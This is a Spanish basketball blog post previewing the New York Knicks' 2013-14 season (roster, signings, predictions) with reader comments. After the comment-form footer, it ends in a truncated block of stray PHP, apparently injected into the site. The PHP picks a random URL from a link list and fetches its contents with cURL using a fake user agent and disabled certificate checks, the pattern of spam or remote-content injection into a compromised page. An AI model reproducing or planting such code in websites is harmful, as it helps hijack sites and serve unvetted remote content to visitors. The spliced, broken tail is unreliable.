New York Nicks: Madison Dreams

08 de October de 2013 por TheDeerHunter

La primera década del siglo XXI fue una de las más aciagas de la historia de la mítica franquicia de “La Gran Manzana”. Las nuevas generaciones de aficionados poco saben de las finales perdidas al principio de los 50 por unos Knicks dirigidos desde el banco por Joe Lapchick y desde la cancha por Dick McGuire; o de la gloriosa era de Red Holzman con dos anillos conquistados y 6 de los 8 números retirados de la franquicia en plantilla (Frazier, Reed, Monroe, Debusschere, Bradley, Barnett); o incluso de los años 90 con un equipo formado alrededor de Pat Ewing con un par de finales disputadas a las órdenes de Riley y Stan Jeff Van Gundy y una aparición constante en playoffs. La esencia de los New York Knicks se acerca más a ser uno de los cimientos de la liga que al coleccionista de contratos tóxicos y decisiones cuestionables que ha sido estos últimos años.

La herencia de la oscura etapa dirigida por Isiah Thomas fue terrorífica. Los Knicks se convirtieron en “El pupas” de la NBA. Ante una deriva deportiva de psiquiátrico la sensibilidad de la afición es bipolar, pasando de la depresión a la euforia y viceversa en cuestión de semanas. Podemos recordar recientemente las cuentas de la lechera con LeBron, el fabuloso capítulo de Jeremy Lin, la imaginaria lucha por el pasado título o incluso el conato de retorno a la directiva del innombrable histórico point guard de los Pistons. No apto para cardíacos.

La pasada campaña fue de largo la mejor del siglo vigente. Un título de división por el que pocos hubieran dado un duro y una victoria en primera ronda sobre los antaño archirrivales Boston Celtics. Por primera vez en mucho tiempo se tuvo confianza ciega en el banquillo y Carmelo Anthony se convirtió en el líder que todos quieren ver en él, recuperando el trono de máximo anotador de la liga. Otro enfant terrible como JR Smith fue elegido como mejor 6º hombre. Muchos se vieron en la final de conferencia y a soñar pero “toda la vida es sueño y los sueños, sueños son”. Indiana no tuvo problemas en coger la medida al ataque del equipo más individualista de la liga y el sabor que quedó fue de decepción, pues las expectativas eran muchas. Demasiadas, seguramente, en un equipo muy poco acostumbrado actualmente a afrontar según qué objetivos. 

Así que, como no podía ser de otra manera, durante la pasada offseason ocurrió un poco de todo, para no olvidarnos que estamos donde estamos. Primero a los Brooklyn Nets se les ocurrió poner un listón de más de 100 millones en salarios y un plantillón bien dispuesto a discutir la plaza de primer equipo de la ciudad. Después, además de los rumores alrededor de Thomas, aparecieron las informaciones surgidas sobre la evolución física de Amar’e Stoudamire lo que lleva a la conclusión de que más de la cuarta parte del salario total de la plantilla está invertida en un ex jugador en activo. Como consecuencia (¿o no?) llegan dos fichajes de riesgo, Andrea Bargnani (11 millones) y Metta World Peace, que evocan determinadas políticas deportivas de no hace mucho. También han incorporado a Beno Udrih. Todo para sustituir a dos históricos como Marcus Camby y Jason Kidd. No parecen los mejores mimbres para consolidar esta “nueva” posición en la élite de la conferencia y la ilusión generada.

En la posición de base hay hasta 3 jugadores solventes. El titular será nuevamente Raymond Felton, que no rinde en ningún sitio como en New York. Una excelente opción para el juego en transición y un peligroso tirador, aunque sufre en defensa y en la distribución a ritmo lento. Pablo Prigioni jugó a un gran nivel en su año de rookie e incluso se adueñó de la titularidad en playoffs pero sus 35 años pueden resultar un problema y, en previsión, se ha fichado a Beno Udrih, un hombre que siempre cumple. En la actual filosofía de los Knicks, la distribución tampoco es uno de los factores clave.Salvo la situación de Stat, por potencial el plantel es similar o incluso un punto superior que el del curso pasado. Cuentan con un par de jugadores de garantías en todas las posiciones.

De escolta saldrá nominalmente de titular Iman Shumpert que dejó correctas sensaciones a la vuelta de su lesión pero muy por debajo de las que transmitía antes de ella. El flamante mejor 6º hombre del año, JR Smith, tratará de aportar la dinamita latente en él. Le vimos altas cotas de genialidad durante la regular pero en la postemporada su nivel languideció. No es fácil que quede algún minuto para el hijo de Tim Hardaway.

Woodson cuenta con dos aleros pesados, con los que podrá desplegar el small ball que tanto utilizó la temporada pasada. Por un lado su jugador estrella, Carmelo Anthony, por el que estos Knicks viven y mueren. Está por ver qué tipo de rol está destinado para Metta World Peace y es una verdadera incógnita la actitud con que va a afrontar esta campaña. Dependiendo de este factor X quedará algo o ningún protagonismo para CJ Leslie.

En la posición de ala-pívot, a falta de conocer con exactitud cómo de mal está Stoudemire, el titular será Andrea Bargnani. Tampoco es que el físico del italiano haya sido habitualmente una garantía pero si está bien podría defender un rol altamente interesante para el equipo. Despreocupado de la defensa y el rebote podrá dedicarse a lo que mejor sabe hacer. Un arma ofensiva a tener en cuenta. Por último, los Knicks también cuentan con Kenyon Martin que aportará su intensidad habitual. La antítesis del anterior.

Gran parte de las opciones defensivas de este equipo giran en torno a su center titular, Tyson Chandler. No estuvo al 100% en playoffs y su equipo lo notó ya que es una pieza clave para alcanzar cualquier objetivo que se plantee. El joven Jeremy Tyler es una absoluta incógnita. Estará varios meses lesionado y muy verde cuando vuelva. Cole Aldrich, sin contrato garantizado, peleará por hacerse con un hueco.

Poco han podido hacer los Knicks para evitar que otros equipos les pasen “por la derecha”. El contrato de Stoudemire es un defecto congénito que únicamente su retirada podría solventar a corto plazo. Nadie sería capaz de aspirar al título con un lastre semejante y no hay objetivos menores que puedan contentar a tan maltratada afición. Previsiblemente se clasificarán para playoffs sin grandes dificultades gracias al discreto nivel de la clase media en la conferencia, pero hay hasta 4 equipos superiores a ellos sobre el papel. No es probable que puedan igualar los hitos del pasado curso, aunque están construidos para plantar cara a la mayoría de rivales.

Quinteto inicial: Raymond Felton, Iman Shumpert, Carmelo Anthony, Andrea Bargnani, Tyson Chandler.
6º hombre: J.R. Smith

Altas: Andrea Bargnani (TOR), Tim Hardaway, Jr. (N), C.J. Leslie (N), Jeremy Tyler, Beno Udrih (ORL), Metta World Peace (LAL).

Bajas: Earl Barron, Marcus Camby (HOU), Chris Copeland (IND), Jason Kidd, Steve Novak (TOR), Quentin Richardson, James White.

Pronóstico: Cerca de las 50 victorias. Segunda plaza en la Atlántico. 1ª Ronda.

Comenta

18 comentarios a esta entrada

  1. txusma dice:
    #1

    El cuarto equipo superior sobre el papel supongo que son los Bulls, no? Si yo fuera aficionado knickerborker estaría preocupado por el rendimiento de JR Smith una vez ha firmado un nuevo contrato. De momento, su comportamiento es de todo menos profesional.

      Citar

  2. rumbero dice:
    #2

    Me parece muy acertado el análisis. Teniendo teóricamente mejor plantilla yo tampoco les veo llegando más lejos que la temporada anterior. Creo que no han corregido las carencias que tienen en la pintura, fiándolo todo otra vez a la temporada que pueda hacer Chandler y como llegue a PO. Supongo que seguiremos viendo a Melo jugando bastantes minutos de 4 y más rondando por ahí MWP. Para la RS puede valer pero en postemporada no está tan claro, a ver como se lo monta Woodson. Y luego como comenta txusma está el tema Smith que da bastante miedito la verdad. A partir de aquí buenos complementos pero que no les hacen subir peldaños en el este creo yo, y acabar 4º o 5º significa un primer cruce muy duro y que luego venga el coco.

      Citar

  3. HisRoyalAirness dice:
    #3

    Al final es lo de todos los años. Los jugadores que ganan anillos siempre tienen al menos un compañero que obliga puntualmente a que se le hagan dobles marcajes. Carmelo no. Y luego pasa como contra Indiana que la defensa es todita para ti

      Citar

  4. txusma dice:
    #4

    HisRoyalAirness:
    Al final es lo de todos los años. Los jugadores que ganan anillos siempre tienen al menos un compañero que obliga puntualmente a que se le hagan dobles marcajes. Carmelo no. Y luego pasa como contra Indiana que la defensa es todita para ti

    Ese compañero podría ser JR Smith pero no sé si estará centrado. A lo mejor, entre que Carmelo jugará de 4, Metta World Peace vete a saber qué hace y la cabeza de Smith, hay minutos para Tim Hardaway Jr.

      Citar

  5. Denise dice:
    #5

    Pues si, coincido con vosotros, salvo lesiones del resto, es dificil que peleen por el anillo, en el Este a priori están un escaloncito por debajo de MIA, IND y CHI.
    No obstante, el trabajo del GM este verano ha sido bastante bueno, han conseguido a Bargnani a costa de perder poca cosa, el contrato de JR es aceptable si este está centrado, y los fichajes de Metta y Udrih practicamente por el minimo son una ganga. Yo creo que Metta atrás sigue siendo un jugador interesante.
    Eso si, los “derbys” contra Brooklyn se presentan apasionantes. Van a ser partidos durisimos y con mucha leña de por medio.

      Citar

  6. Ruxixón dice:
    #6

    La progresión de otros equipos,el hecho de conservar las mismas debilidades y estar en el día de la marmota en lo que respecta a Stoudemire y su lesión.Con todo eso junto me sale un mix de involución en los Knicks.Se clasificarán para PO sin ninguna duda pero creo que son carne de primera ronda ante cualquier rival.

    Luego tampoco veo lógica en el salida de Grunweld para que ocupe ahora un papel de “consejero” -suponemos que estaré en la organización pero su voz no servirá para nada- y colocar en su rol,aún con mayor importancia,a Mills que estuvo ahí en la más reciente época oscura del equipo.

      Citar

  7. Simon dice:
    #7

    la única opción para New York de pasar ronda es ir a muerte en la regular y conseguir ser terceros de conferencia puesto que en liga regular no veo tan intocables a Indiana y Brooklyn… eso si, si no conseguir el tercer puesto de la conferencia serán eliminados en primera ronda por cualquiera de los otros cuatro equipos grandes del este.

      Citar

  8. Vader dice:
    #8

    Buen análisis!! Estoy de acuerdo en todo.

    Año de transición en NY. Los resultados serán parecidos a los del año pasado, ni más ni menos. No hay equipo para ser campeón. El estado físico de Stat es una losa que pesa demasiado. Si este hubiera estado sano siempre se podría haber intentando un trade aunque fuera por nada a cambio, sólo soltar salario. En sus condiciones es imposible.

    A final de la próxima temporada el contrato de Stat será expiring y también los de Chandler, Felton y Bargnani (esta es una de las claves de su fichaje pues Novak tenia un año más de contrato). Parece ser que la intención de Melo es quedarse pero lo más probable es que decida según los movimientos que hagan los Knicks el verano que viene con las cartas que tendrá la franquicia. Los expirings mencionados (o alguno de ellos), más rondas, más quizás Shumpert y/o Hardaway Jr. podrían ser traspasados para acompañar a Melo de alguna otra estrella que permita hacer el último salto de calidad que necesita el equipo para ser un contender con posibilidades reales.

    Este año el interés principal será ver la evolución de Shumpert y Hardaway Jr., si Bargnani en otra ambiente da otro nivel, MWP, el estado físico de Stat y si Melo sigue tan enchufado si le mueven a la posición de 3 de nuevo.

    Yo creo que hay serias posibilidades de hacerse con el título del Atlántico en regular season, a partir de ahí lo dicho, año de transición que puede desembocar en la salida de Melo del equipo o en que la franquicia le sepa rodear mejor.

    Saludos!!

      Citar

  9. Vader dice:
    #9

    Malas noticias para New York Knicks. Aunque su primera opción sea quedarse en el equipo, Melo ha declarado que el próximo verano entrará en la agencia libre. Que aunque sea una vez en la vida quiere tener la oportunidad de evaluar propuestas y elegir destino.

    Esto tiene mala pinta para los Knicks pues si Melo hubiera ejercido su opción de un año más hubiera entrado en la agencia libre en el 2015 donde los Knicks tendrán mucha más flexibilidad para fichar y poder rodear mejor a su estrella.

    El verano que viene los Knicks ciertamente podrán mejorar su plantilla pues tendrá algunos expirings jugosos pero habrá rivales que directamente tendrán espacio salarial para fichar a Melo y algo más. Hablo sobretodo de los Lakers.

    En fin veremos que pasa pero como Melo decida que lejos de New York puede ganar antes el anillo abocara a los Knicks a una crisis en toda regla pues quizás cuando decida irse los Knicks ya habran hecho traspasos pensando en que se queda (o para convencerle que se quede…).

    Saludos

      Citar

  10. Denise dice:
    #10

    Vader:
    Malas noticias para New York Knicks. Aunque su primera opción sea quedarse en el equipo, Melo ha declarado que el próximo verano entrará en la agencia libre. Que aunque sea una vez en la vida quiere tener la oportunidad de evaluar propuestas y elegir destino.

    Esto tiene mala pinta para los Knicks pues si Melo hubiera ejercido su opción de un año más hubiera entrado en la agencia libre en el 2015 donde los Knicks tendrán mucha más flexibilidad para fichar y poder rodear mejor a su estrella.

    El verano que viene los Knicks ciertamente podrán mejorar su plantilla pues tendrá algunos expirings jugosos pero habrá rivales que directamente tendrán espacio salarial para fichar a Melo y algo más. Hablo sobretodo de los Lakers.

    En fin veremos que pasa pero como Melo decida que lejos de New York puede ganar antes el anillo abocara a los Knicks a una crisis en toda regla pues quizás cuando decida irse los Knicks ya habran hecho traspasos pensando en que se queda (o para convencerle que se quede…).

    Saludos

    Va a Lakers fijo.

    Y tampoco creo que sea el fin del mundo para los Knicks. Con Melo tampoco han olido ni de lejos el anillo. Obviamente en la 14-15 dificilmente entrarían en Playoffs, pero en la 15-16 se plantarían con mas de 50 millones para fichar agentes libres, cosa no muy dificil en una ciudad como NY, mas el rookie que pillasen ese verano que posiblemente fuese un top 10 del Draft.

      Citar

  11. Vader dice:
    #11

    El problema es que para cuando Melo decida es posible que los Knicks ya hayan traspasado expirings más piezas como Shumpert para conseguir rodear mejor a Melo. Y luego se queden compuestos y sin “novio”. Por otra parte si no hacen nada aumentaran las posibilidades de que Melo se vaya… Es una situación difícil de gestionar.

    Por otra parte los Knicks no tenemos primeras rondas hasta la 2017 creo… XD

    Saludos

      Citar

  12. Melo15 dice:
    #12

    Cuando acaba contrato Stat? Este año no? Pues con el expiring de Stoudmire ya tienen dinero suficiente como para fichar una estrella para acompañar a Melo o un par de jugadores de mucha calidad.
    Con eso mas la plantilla que tenemos, que no es mala pues depende de como salgan las cosas se podria optar al anillo.

      Citar

  13. Vader dice:
    #13

    Stat tiene este año y otro más de contrato, igual que Bargniani. Ahí está el problema…

      Citar

  14. Melo15 dice:
    #14

    Y cuanto dinero liberariamo este veranos? Porque por ejemplo se rumore que Monroe no va seguir en Detroit y seguro que hay otro agentes libre de nivel.

      Citar

  15. Denise dice:
    #15

    Melo15:
    Y cuanto dinero liberariamo este veranos? Porque por ejemplo se rumore que Monroe no va seguir en Detroit y seguro que hay otro agentes libre de nivel.

    Melo, suponiendo que Carmelo se vaya, y Amare y Bargnani ejecuten sus Player Options (que lo van a hacer) , los Knicks tendrían una masa salarial de 65 millones aproximadamente sin contar a Shumpert al cual habría que renovarlo. Es decir, los Knicks no podrían firmar a ningun agente libre de calidad, salvo que amnistien a Amare.

      Citar

  16. Vader dice:
    #16

    Denise: Melo, suponiendo que Carmelo se vaya, y Amare y Bargnani ejecuten sus Player Options (que lo van a hacer) , los Knicks tendrían una masa salarial de 65 millones aproximadamente sin contar a Shumpert al cual habría que renovarlo. Es decir, los Knicks no podrían firmar a ningun agente libre de calidad, salvo que amnistien a Amare.

    Creo que este año era el último que se podía usar la clausula de amnístia. Sea como sea los Knicks ya la usaron hace tiempo en Billups para poder fichar a Tyson Chandler.

    Saludos

      Citar

  17. txusma dice:
    #17

    Tim Hardaway Jr. está dejando muy buenas sensaciones en pretemporada y forma un tandem muy interesante con Shumpert. Habrá que estar atento a esta pareja.

      Citar

  18. Vader dice:
    #18

    “It’s done”, Greg Anthony de NBA TV ha dicho que el acuerdo Phil Jackson NY Knicks esta hecho. No se sabe que titulo/cargo llevara Phil Jackson y no ha querido revelar su fuente pero ha asegurado que el acuerdo es un hecho.

    Yo me temía un cambio de rumbo en cualquier momento y más ahora que Mike D’Antoni vuelve a estar en la picota…

    Me alegro mucho de la llegada de Phil Jackson a Knicks. Desde luego hay que ver como funciona, será un manager “rookie” pero no deja de ser una sacudida importante a la organización, un cambio de rumbo y un aumento de credibilidad para la franquicia que le hacía falta desde hace muchos años.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>